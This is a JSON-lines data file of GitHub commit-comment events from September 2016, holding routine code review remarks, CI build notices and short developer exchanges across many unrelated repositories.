{"id":"4573975802","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053933,"position":33,"line":432,"path":"httpmon.cc","commit_id":"51eb4be633dcb07e36d3d6ed232296892e047b93","created_at":"2016-09-16T13:15:59Z","updated_at":"2016-09-16T13:15:59Z","body":"I would rather write `control.url.clear(); control.url.push_back(value);`."}},"created_at":"2016-09-16T13:15:59Z"}
{"id":"4573976889","type":"CommitCommentEvent","actor":{"login":"kotlin95"},"repo":{"name":"kotlin95/my-first-blog"},"payload":{"comment":{"id":19053938,"position":11,"line":8,"path":"blog/views.py","commit_id":"3a946f42e4921f442f30aebe48fde9e7379ceaad","created_at":"2016-09-16T13:16:13Z","updated_at":"2016-09-16T13:16:13Z","body":"bardzo ważne"}},"created_at":"2016-09-16T13:16:13Z"}
{"id":"4573978181","type":"CommitCommentEvent","actor":{"login":"Summerzhe"},"repo":{"name":"TDBYWB/Calc"},"payload":{"comment":{"id":19053943,"position":null,"line":null,"path":null,"commit_id":"ebed722fc94b212e2dde4375cb912f1d30cd2cfe","created_at":"2016-09-16T13:16:28Z","updated_at":"2016-09-16T13:16:28Z","body":"draft mode for the Chapter 2"}},"created_at":"2016-09-16T13:16:28Z"}
{"id":"4573978195","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19053944,"position":null,"line":null,"path":null,"commit_id":"552e104d44235f6a809c620c60a4d14faaf45551","created_at":"2016-09-16T13:16:29Z","updated_at":"2016-09-16T13:16:29Z","body":"[Code coverage](https://112-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.5%**"}},"created_at":"2016-09-16T13:16:29Z"}
{"id":"4573979202","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053946,"position":43,"line":526,"path":"httpmon.cc","commit_id":"51eb4be633dcb07e36d3d6ed232296892e047b93","created_at":"2016-09-16T13:16:40Z","updated_at":"2016-09-16T13:16:40Z","body":"Are you sure this does not trigger a segfault? Shouldn't it be `control.url.push_back(url)`?"}},"created_at":"2016-09-16T13:16:40Z"}
{"id":"4573984021","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":19053961,"position":null,"line":null,"path":null,"commit_id":"010711015ea22e47071dcca1dd95f935b0d75275","created_at":"2016-09-16T13:17:44Z","updated_at":"2016-09-16T13:17:44Z","body":"Thank you @STJEREM ! These Json files are up to date now."}},"created_at":"2016-09-16T13:17:44Z"}
{"id":"4573986582","type":"CommitCommentEvent","actor":{"login":"sifue"},"repo":{"name":"progedu/intro-curriculum-4023"},"payload":{"comment":{"id":19053966,"position":null,"line":null,"path":null,"commit_id":"253e853e7546d495818a4679a4ae5a126c7df974","created_at":"2016-09-16T13:18:16Z","updated_at":"2016-09-16T13:18:16Z","body":":+1:\r\nいいねー"}},"created_at":"2016-09-16T13:18:16Z"}
{"id":"4573989005","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19053970,"position":null,"line":null,"path":null,"commit_id":"a3eaa46db038ed929d36810bd1789f782194a17b","created_at":"2016-09-16T13:18:46Z","updated_at":"2016-09-16T13:18:46Z","body":"Will use it on the next Restart. "}},"created_at":"2016-09-16T13:18:46Z"}
{"id":"4573989500","type":"CommitCommentEvent","actor":{"login":"vberthiaume"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19053971,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-16T13:18:52Z","updated_at":"2016-09-16T13:18:52Z","body":"Thank you for doing all this work! So far I have something working-ish with\nmy (ridiculous) fixes to HPlayer so I don't really feel like trying a whole\nnew approach, especially because compiling on the pi is such a pain (i have\nyet to set up a cross compiler...).\n\nOn Wed, Sep 14, 2016 at 11:00 AM, Maigre <notifications@github.com> wrote:\n\n> Hi,\n> i did not succeed in building VLC again (spend couple hours trying by\n> different ways..)\n> BUT i did found this page:\n> https://nwgat.ninja/installing-mpv-with-hardware-\n> decoding-on-raspberry-pi-1-2-3-zero/\n> it is a DEB package of ffmpeg + mpv (another player) ready for the pi AND\n> with alsa support :)\n>\n> It is also possible to compile it from source, and to use there libmpv to\n> embed in other applications.\n> It definitly sounds like a good alternative to libvlc for the next HPlayer\n> version !\n>\n> I will dig into that, but right now you can use the DEBs provided to\n> install the player.\n> The documentation for MPV player can be found here:\n> https://mpv.io/manual/stable/\n> Let me know if it works out for you !\n>\n> Best Regards,\n>\n>\n> 2016-09-13 17:50 GMT+02:00 Vincent Berthiaume <notifications@github.com>:\n>\n> > sounds good, thank you so much!\n> >\n> > On Tue, Sep 13, 2016 at 11:49 AM, Maigre <notifications@github.com>\n> wrote:\n> >\n> > > so i found it but i sadly did not compile it with static lib so it\n> still\n> > > require the custom recompiled version of libvlc which i do not have\n> here.\n> > > I'll try to recompile it properly and send it to you but it will take\n> > some\n> > > time (libvlc compiling takes couple hours...) i'll let you know if i\n> end\n> > up\n> > > with something usable.\n> > >\n> > > —\n> > > You are receiving this because you authored the thread.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/vberthiaume/HPlayer/commit/\n> > 7c92cda10413b951794d95208d420c4379698785#commitcomment-19003921>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/ADjIMdmpSrKSn2-\n> > TLFn1nDMc2B4Luq48ks5qpsYcgaJpZM4J7ww8>\n> >\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/vberthiaume/HPlayer/commit/\n> 7c92cda10413b951794d95208d420c4379698785#commitcomment-19003942>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AAq2wWJRb4QkHgtgeG8doyvZbl38ZL5Bks5qpsZUgaJpZM4J7ww8>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vberthiaume/HPlayer/commit/7c92cda10413b951794d95208d420c4379698785#commitcomment-19020501>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADjIMU9Bj3pbyWO1r6GJXJ8j5sPBujvcks5qqAwagaJpZM4J7ww8>\n> .\n>\n"}},"created_at":"2016-09-16T13:18:52Z"}
{"id":"4573990454","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053976,"position":17,"line":398,"path":"httpmon.cc","commit_id":"05d4de96649cc13f74d87ad8d294e3924ed0921d","created_at":"2016-09-16T13:19:05Z","updated_at":"2016-09-16T13:19:05Z","body":"This strongly relies on the user doing the right thing and having the same number of URLs as concurrency. Besides not assuming that the user does the right thing, I would also extend a bit the feature to allow the number of URLs and the concurrency to be different, mapping URLs to client threads in a round-robin fashion. So ... I would simply do something like:\r\n\r\n`control.url.clear(); while (std::getline(file, urlTemp)) control.url.push_back(urlTemp);`"}},"created_at":"2016-09-16T13:19:05Z"}
{"id":"4573991024","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19053978,"position":null,"line":null,"path":null,"commit_id":"7965380be24ee5c52f0f0154da37cce53b5ebfbe","created_at":"2016-09-16T13:19:12Z","updated_at":"2016-09-16T13:19:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1022](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13425&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:19:12Z"}
{"id":"4573993193","type":"CommitCommentEvent","actor":{"login":"weltling"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19053987,"position":null,"line":null,"path":null,"commit_id":"977cbc2fff1a3ec9d29a2c0904fae01bfd64c6c2","created_at":"2016-09-16T13:19:38Z","updated_at":"2016-09-16T13:19:38Z","body":"You're right. The savepoint is only used in 5.6 and 7.0 for backward compatibility. In 7.1+ there's no suppression. Apropos, knowing the DB first is probably a prerequisite to work with any abstraction layer, anyway.\r\n\r\nThanks."}},"created_at":"2016-09-16T13:19:38Z"}
{"id":"4573993358","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053988,"position":5,"line":537,"path":"httpmon.cc","commit_id":"1453628d4fd5f621f55e4983728299969d7c54fe","created_at":"2016-09-16T13:19:41Z","updated_at":"2016-09-16T13:19:41Z","body":"Funny, I keep having the same issue. :smile:"}},"created_at":"2016-09-16T13:19:41Z"}
{"id":"4573997033","type":"CommitCommentEvent","actor":{"login":"faizauthar12"},"repo":{"name":"MoKee/android_device_xiaomi_ferrari"},"payload":{"comment":{"id":19053999,"position":null,"line":null,"path":null,"commit_id":"bfb0add310cd0f34400b286506f93fa28588511f","created_at":"2016-09-16T13:20:25Z","updated_at":"2016-09-16T13:20:25Z","body":"and again\r\nwithout a right maintainer :|\r\n\r\nplease guys stop doing a blind build without a right infos :/ \r\nit's bad "}},"created_at":"2016-09-16T13:20:25Z"}
{"id":"4573998259","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19054001,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T13:20:41Z","updated_at":"2016-09-16T13:20:41Z","body":"Not according to https://docs.oracle.com/javase/specs/jls/se7/html/jls-13.html#jls-13.4.21."}},"created_at":"2016-09-16T13:20:41Z"}
{"id":"4574000257","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19054005,"position":null,"line":null,"path":null,"commit_id":"a3eaa46db038ed929d36810bd1789f782194a17b","created_at":"2016-09-16T13:21:06Z","updated_at":"2016-09-16T13:21:06Z","body":"Ill Check it out when I wake Up Whats Dirty About it?"}},"created_at":"2016-09-16T13:21:06Z"}
{"id":"4574004469","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19054013,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-16T13:21:58Z","updated_at":"2016-09-16T13:21:58Z","body":"Well, I never tested it under Apache since set it up under Windows is bit complicated. You may want to create an issue for this one."}},"created_at":"2016-09-16T13:21:58Z"}
{"id":"4574008865","type":"CommitCommentEvent","actor":{"login":"lsh-0"},"repo":{"name":"elifesciences/builder"},"payload":{"comment":{"id":19054025,"position":null,"line":null,"path":null,"commit_id":"8be745f6d7c94bf89af45f638a2f08ac3ab93b1d","created_at":"2016-09-16T13:22:49Z","updated_at":"2016-09-16T13:22:49Z","body":"fair enough. could you add this as a comment then?\n\n    # creates a copy of stack.__dict__\n\nwrapping a `dict()` call around a __dict__ looks unusual enough to\nwarrant an explanation\n\n\nOn Fri, Sep 16, 2016 at 2:15 PM, Giorgio Sironi\n<notifications@github.com> wrote:\n> Fixing bug on ec2 data\n>\n> All instances in a stack shared the same dictionary stack.__dict__ and hence all had the same ip address; taking a copy of the dict\n> /cc @lsh-0\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/elifesciences/builder/commit/8be745f6d7c94bf89af45f638a2f08ac3ab93b1d\n\n\n\n-- \n\nLuke Skibinski\n\nFormally defined,\nExtensively tested,\nCryptic, abstract, thing.\n\n--\n\neLife Sciences Publications, Ltd is a limited liability non-profit\nnon-stock corporation incorporated in the State of Delaware, USA, with\ncompany number 5030732, and is registered in the UK with company\nnumber FC030576 and branch number BR015634 at the address First Floor,\n24 Hills Road, Cambridge CB2 1JP.\n"}},"created_at":"2016-09-16T13:22:49Z"}
{"id":"4574010125","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/artwork-maia"},"payload":{"comment":{"id":19054028,"position":null,"line":null,"path":null,"commit_id":"1943363ca94ebc93829ebaaccf318b2a6d4a0021","created_at":"2016-09-16T13:23:06Z","updated_at":"2016-09-16T13:23:06Z","body":"Ok. I figured it out :wink: https://github.com/manjaro/artwork-maia/commit/97250f6edd2e8dd979ddbf69c29a3895e270c8ed"}},"created_at":"2016-09-16T13:23:06Z"}
{"id":"4574013390","type":"CommitCommentEvent","actor":{"login":"orthagh"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":19054039,"position":21,"line":251,"path":"inc/notificationtemplate.class.php","commit_id":"44e5967a56b448e3fe4477ccc2c32e0316bf2e82","created_at":"2016-09-16T13:23:39Z","updated_at":"2016-09-16T13:23:39Z","body":"i could be wrong, but i think the next line (session:load...) do the same think as your bak restoration, no ?"}},"created_at":"2016-09-16T13:23:39Z"}
{"id":"4574016730","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19054046,"position":null,"line":null,"path":null,"commit_id":"01ba82c832c1a40bdcc5518adda69d267990a062","created_at":"2016-09-16T13:24:18Z","updated_at":"2016-09-16T13:24:18Z","body":"[Code coverage](https://113-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.5%**"}},"created_at":"2016-09-16T13:24:18Z"}
{"id":"4574020384","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"3x7r3m157/address_bloc"},"payload":{"comment":{"id":19054058,"position":null,"line":null,"path":null,"commit_id":"918fc5eca702dfd2c98cb542dfcaeab0ee4d605d","created_at":"2016-09-16T13:25:03Z","updated_at":"2016-09-16T13:25:03Z","body":"@3x7r3m157 Looks good here! Press ahead."}},"created_at":"2016-09-16T13:25:03Z"}
{"id":"4574021490","type":"CommitCommentEvent","actor":{"login":"tomolimo"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":19054060,"position":21,"line":251,"path":"inc/notificationtemplate.class.php","commit_id":"44e5967a56b448e3fe4477ccc2c32e0316bf2e82","created_at":"2016-09-16T13:25:17Z","updated_at":"2016-09-16T13:25:17Z","body":"Not really, it doesn't assign a value to  $_SESSION[\"glpilanguage\"], but rather uses it intensively"}},"created_at":"2016-09-16T13:25:17Z"}
{"id":"4574024103","type":"CommitCommentEvent","actor":{"login":"miguel456"},"repo":{"name":"miguel456/php-ip-address-logger"},"payload":{"comment":{"id":19054065,"position":null,"line":null,"path":null,"commit_id":"7d497384642fcefabb114fb9513c5b95911f7cfb","created_at":"2016-09-16T13:25:47Z","updated_at":"2016-09-16T13:25:47Z","body":"There may be bugs I made this like, in a rush"}},"created_at":"2016-09-16T13:25:47Z"}
{"id":"4574024515","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054066,"position":57,"line":4553,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:25:52Z","updated_at":"2016-09-16T13:25:52Z","body":"_There are two internal storages_ => _There are two internal storage areas_\r\n(\"storages\" is not common English usage)"}},"created_at":"2016-09-16T13:25:52Z"}
{"id":"4574024900","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054067,"position":null,"line":null,"path":null,"commit_id":"76ef0af8a763dbb980c01b7f140b27d1758bdfb3","created_at":"2016-09-16T13:25:55Z","updated_at":"2016-09-16T13:25:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1023](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13428&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:25:55Z"}
{"id":"4574026226","type":"CommitCommentEvent","actor":{"login":"UltimateByte"},"repo":{"name":"GameServerManagers/LinuxGSM"},"payload":{"comment":{"id":19054071,"position":null,"line":null,"path":null,"commit_id":"2a5896488722877ee17c761b869c23ab42c89309","created_at":"2016-09-16T13:26:12Z","updated_at":"2016-09-16T13:26:12Z","body":"Good job ! :+1: "}},"created_at":"2016-09-16T13:26:12Z"}
{"id":"4574026544","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054073,"position":null,"line":null,"path":null,"commit_id":"76ef0af8a763dbb980c01b7f140b27d1758bdfb3","created_at":"2016-09-16T13:26:15Z","updated_at":"2016-09-16T13:26:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1023](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13428&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:19"}},"created_at":"2016-09-16T13:26:15Z"}
{"id":"4574028943","type":"CommitCommentEvent","actor":{"login":"ChristianBeer"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19054077,"position":null,"line":null,"path":null,"commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T13:26:45Z","updated_at":"2016-09-16T13:26:45Z","body":"There are some issues with the changes in boincwork.admin.inc where we still need the preset to be an attribute because this is for the actual definition of the default values for the presets that are stored in the DB. This attribute should not propagate to the actual user prefs, my solution should already take care of this. \r\nWhile looking this up I found a discrepancy between the function that reads the preset values (`boincwork_get_preset_prefs`) and the function that saves them (`boincwork_save_preset_prefs` via `boincwork_admin_prefs_presets_form_submit`). The first expects a tag like this: `<preset name=\"green\">` the other writes a tag like this: `<preset preset=\"green\">` when an admin changes the default preset values. This is a different issue that we need to fix."}},"created_at":"2016-09-16T13:26:45Z"}
{"id":"4574028981","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19054078,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T13:26:45Z","updated_at":"2016-09-16T13:26:45Z","body":"Indeed. Found it here too: https://github.com/revapi/revapi/blob/master/revapi-java-spi/src/main/java/org/revapi/java/spi/Code.java#L148 It's a source incompatibility not a binary one.\r\n\r\nSo I think that's what we need to mention in the justification: Young API + it's not a binary incompatibility (only source level)."}},"created_at":"2016-09-16T13:26:45Z"}
{"id":"4574029331","type":"CommitCommentEvent","actor":{"login":"zdavis"},"repo":{"name":"ManifoldScholar/manifold"},"payload":{"comment":{"id":19054079,"position":14,"line":26,"path":"client/src/components/reader/Section/Section.js","commit_id":"390ea5f3484187884a5f9bf759a32af4fb3c830c","created_at":"2016-09-16T13:26:49Z","updated_at":"2016-09-16T13:26:49Z","body":"Hey @naomiyaki, I'm doing some refactoring on this, so no change required, but wanted to point out that this is probably not the best default state. Our component will definitely need to know if there is a selection or not. If we model the lack of a selection as { selection: null }, then checks for whether text is selected are much simpler. If we model it as an empty object, the only way to distinguish between a selection and a non-selection is to count the number of key/values in the object, which is kind of messy. "}},"created_at":"2016-09-16T13:26:49Z"}
{"id":"4574030475","type":"CommitCommentEvent","actor":{"login":"jpic"},"repo":{"name":"novafloss/ansible-setup"},"payload":{"comment":{"id":19054083,"position":null,"line":null,"path":null,"commit_id":"213426f167f71532bc8a78de703894fc72bb5756","created_at":"2016-09-16T13:27:03Z","updated_at":"2016-09-16T13:27:03Z","body":"\r\nEst-ce-que tu pourrais trouver des noms plus descriptifs que wtf pour tes branches stp ? :)"}},"created_at":"2016-09-16T13:27:03Z"}
{"id":"4574032982","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19054086,"position":null,"line":null,"path":null,"commit_id":"6ad33d66a42f6e584a515b0609dfd04d2c3b8810","created_at":"2016-09-16T13:27:33Z","updated_at":"2016-09-16T13:27:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#H0IIWpfKSB-ejofOn--gig"}},"created_at":"2016-09-16T13:27:33Z"}
{"id":"4574033475","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054087,"position":68,"line":4561,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:27:38Z","updated_at":"2016-09-16T13:27:38Z","body":"_Initially it is empty and populated when..._ => _Initially it is empty. It becomes populated when..._\r\n\r\nUse of \"and\" is confusing -- it seems to say that the storage is both empty and populated."}},"created_at":"2016-09-16T13:27:38Z"}
{"id":"4574036524","type":"CommitCommentEvent","actor":{"login":"chrisvanpatten"},"repo":{"name":"mgibbs189/custom-field-suite"},"payload":{"comment":{"id":19054096,"position":null,"line":null,"path":null,"commit_id":"c487e2579c6c978314d53f5937aff98ff17caf1e","created_at":"2016-09-16T13:28:15Z","updated_at":"2016-09-16T13:28:15Z","body":"A little terrified, but… introducing my first commit on upstream :tada:"}},"created_at":"2016-09-16T13:28:15Z"}
{"id":"4574041903","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054106,"position":null,"line":null,"path":null,"commit_id":"4beb2150f4952d971194c5051d096350fbbb04c5","created_at":"2016-09-16T13:29:17Z","updated_at":"2016-09-16T13:29:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1024](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13430&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:29:17Z"}
{"id":"4574042420","type":"CommitCommentEvent","actor":{"login":"jpic"},"repo":{"name":"novafloss/ansible-setup"},"payload":{"comment":{"id":19054108,"position":31,"line":98,"path":"setup.sh","commit_id":"213426f167f71532bc8a78de703894fc72bb5756","created_at":"2016-09-16T13:29:23Z","updated_at":"2016-09-16T13:29:23Z","body":"Zut, je comprends pas pourquoi on crée un virtualenv dans ~/.ansible-setup alors qu'avant c'était ~/.ansible-env."}},"created_at":"2016-09-16T13:29:23Z"}
{"id":"4574044110","type":"CommitCommentEvent","actor":{"login":"jpstroop"},"repo":{"name":"IIIF/iiif.io"},"payload":{"comment":{"id":19054111,"position":40,"line":40,"path":"source/api/annex/notes/design_patterns.md","commit_id":"fa809782a558c6e19004420fa6dd30069774fa4a","created_at":"2016-09-16T13:29:42Z","updated_at":"2016-09-16T13:29:42Z","body":"Should probably have 2-3 more sentences about REST and the difference between REST and services. And then explain how `service` in the APIs is different."}},"created_at":"2016-09-16T13:29:42Z"}
{"id":"4574044604","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19054112,"position":null,"line":null,"path":null,"commit_id":"f3b4baf319a793c49a3513d13602572aaf1a0a97","created_at":"2016-09-16T13:29:47Z","updated_at":"2016-09-16T13:29:47Z","body":"For example   <!-- Здесь нет больниц, нам нужно поехать в ближайший город. -->\r\nnoun \"город\" can not be NN:Masc:Sin:Nom  (Nominative) , it can only be  NN:Masc:Sin:V (Acusative) in this context.\r\n"}},"created_at":"2016-09-16T13:29:47Z"}
{"id":"4574045937","type":"CommitCommentEvent","actor":{"login":"jpstroop"},"repo":{"name":"IIIF/iiif.io"},"payload":{"comment":{"id":19054115,"position":44,"line":44,"path":"source/api/annex/notes/design_patterns.md","commit_id":"fa809782a558c6e19004420fa6dd30069774fa4a","created_at":"2016-09-16T13:30:02Z","updated_at":"2016-09-16T13:30:02Z","body":"Link(s)?"}},"created_at":"2016-09-16T13:30:02Z"}
{"id":"4574046703","type":"CommitCommentEvent","actor":{"login":"ABeloeil"},"repo":{"name":"ABeloeil/SpaceShooter"},"payload":{"comment":{"id":19054117,"position":null,"line":null,"path":null,"commit_id":"f08783517c823f7b5f7151ab75f2ec44e982ae5c","created_at":"2016-09-16T13:30:14Z","updated_at":"2016-09-16T13:30:14Z","body":":cactus: "}},"created_at":"2016-09-16T13:30:14Z"}
{"id":"4574047121","type":"CommitCommentEvent","actor":{"login":"cnemec"},"repo":{"name":"cnemec/firstprojec"},"payload":{"comment":{"id":19054119,"position":null,"line":null,"path":null,"commit_id":"511155df5a3fa7a314aa8227a1c0497726f2eeb0","created_at":"2016-09-16T13:30:19Z","updated_at":"2016-09-16T13:30:19Z","body":"<img width=\"492\" alt=\"untitled\" src=\"https://cloud.githubusercontent.com/assets/22196930/18587464/cc54386a-7be7-11e6-90f2-d0536907f945.png\">\r\n"}},"created_at":"2016-09-16T13:30:19Z"}
{"id":"4574047586","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19054120,"position":null,"line":null,"path":null,"commit_id":"eb3360b02ab82d20bc3c3f38f543b0d742598346","created_at":"2016-09-16T13:30:21Z","updated_at":"2016-09-16T13:30:21Z","body":"`getNode` sounds good, let me provide a PR :)"}},"created_at":"2016-09-16T13:30:21Z"}
{"id":"4574049515","type":"CommitCommentEvent","actor":{"login":"slarew"},"repo":{"name":"slarew/julia"},"payload":{"comment":{"id":19054122,"position":null,"line":null,"path":null,"commit_id":"75fa2e15453af87be5900528bde5332d5e3b92ae","created_at":"2016-09-16T13:30:42Z","updated_at":"2016-09-16T13:30:42Z","body":"@staticfloat Adding a second special `julia` with only the 'inherit' entitlement is my first solution  IIRC, the underlying problem that motivated having a second special `julia` was that the App Sandbox rules were not allowing running `julia` as a child process of itself.  It looks like the log files already expired on my dev machine, but iirc the error was \"Could not set sandbox profile data: Operation not permitted (1)\" as in [this SO post](http://stackoverflow.com/questions/19765237/nstask-from-sandboxed-helper-app-fails-with-could-not-set-sandbox-profile-data)."}},"created_at":"2016-09-16T13:30:42Z"}
{"id":"4574050400","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054125,"position":null,"line":null,"path":null,"commit_id":"7965380be24ee5c52f0f0154da37cce53b5ebfbe","created_at":"2016-09-16T13:30:52Z","updated_at":"2016-09-16T13:30:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1022](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13425&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:11:39"}},"created_at":"2016-09-16T13:30:52Z"}
{"id":"4574051427","type":"CommitCommentEvent","actor":{"login":"TimHeckel"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":19054127,"position":null,"line":null,"path":null,"commit_id":"26d082b62ef6f6d92e80f69f18b6bede65bd7e98","created_at":"2016-09-16T13:31:03Z","updated_at":"2016-09-16T13:31:03Z","body":"@benjamn - thanks! btw, @thorjarhun and others have noted that this fix doesn't seem to stop the fiber spikes reported in [the original issue](https://github.com/meteor/meteor/issues/7747) :/"}},"created_at":"2016-09-16T13:31:03Z"}
{"id":"4574051754","type":"CommitCommentEvent","actor":{"login":"terablade2001"},"repo":{"name":"terablade2001/Simd"},"payload":{"comment":{"id":19054128,"position":null,"line":null,"path":null,"commit_id":"99f95cc76a67565a7f37fabbc820dc037a277abd","created_at":"2016-09-16T13:31:09Z","updated_at":"2016-09-16T13:31:09Z","body":"1) The above code may not be correct (I am trying to figure out how this library is working, as far as I can not find the analytical documentation!)\r\n\r\n2) It seems that for 1 person and 11 persons the total execution time of the Face Detection algorithm is similar and quite high (609.363 msec vs 591.001 msec). This is not something that it was expected (if everything are ok).\r\n"}},"created_at":"2016-09-16T13:31:09Z"}
{"id":"4574052629","type":"CommitCommentEvent","actor":{"login":"jpstroop"},"repo":{"name":"IIIF/iiif.io"},"payload":{"comment":{"id":19054132,"position":48,"line":48,"path":"source/api/annex/notes/design_patterns.md","commit_id":"fa809782a558c6e19004420fa6dd30069774fa4a","created_at":"2016-09-16T13:31:17Z","updated_at":"2016-09-16T13:31:17Z","body":"JSON-LD because our primary target is rich web clients. Explain \"context abstraction\", i.e. it's only RDF if you care about such things."}},"created_at":"2016-09-16T13:31:17Z"}
{"id":"4574053847","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054134,"position":72,"line":4565,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:31:31Z","updated_at":"2016-09-16T13:31:31Z","body":"Although the _node instance set_ is referenced as being mutated by the construction of an AudioWorkletNode, it is not otherwise referenced or its contents consulted as far as I could see. If this is going to the the case then it should not be in the spec as it has no observable consequences."}},"created_at":"2016-09-16T13:31:31Z"}
